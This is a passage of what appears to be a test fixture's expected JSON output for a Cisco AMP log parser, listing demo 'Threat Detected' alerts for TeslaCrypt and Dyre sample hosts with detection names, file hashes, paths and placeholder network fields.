"209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 14567, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196244", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 209000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 15892, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196243", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17217, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196242", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 147000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 18542, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196241", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 19867, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196240", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 21191, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259080131182683", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 996000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259080131183000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 22515, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251507855228943", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 944000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 23834, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 8000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 25159, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261640", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 821000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26489, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261639", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27769, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261638", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29385, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261637", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 680000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 30665, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261636", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 665000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 32281, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261635", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 509000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 33561, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259028591575130", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 984000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259028591575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": 